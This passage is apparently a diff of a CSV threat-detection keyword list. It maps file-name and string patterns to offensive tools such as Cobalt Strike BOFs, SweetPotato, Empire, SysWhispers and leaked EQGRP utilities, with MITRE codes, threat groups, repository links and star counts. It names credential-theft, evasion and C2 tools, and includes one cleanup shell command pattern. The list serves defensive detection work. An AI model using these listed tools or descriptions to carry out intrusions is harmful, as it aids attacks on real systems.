- TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SweetPotato.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*SweetPotato.ImpersonationToken*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.sln*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*swisskyrepo/SharpLAPS*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*swisskyrepo/SSRFmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SwitchPriv.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*SxNade/Rudrastra*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" -"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*sync-starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*synergy_httpx.py*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*Synergy-httpx-main*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*syscall_disable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*syscall_enable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" -"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*syscalls.asm*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syscalls.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*syscalls_dump.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" @@ -17513,23 +17696,23 @@ "*sysmonquiet.*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*SysmonQuiet-main*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*SySS-Research*","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*system rm -f /current/tmp/ftshell.latest*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/Aomain Admins*","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*SYSTEM\CurrentControlSet\Services\dcrypt*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*systemctl start nessusd*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*SysWhispers.git *","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" -"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*syswhispers.py*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "*SysWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 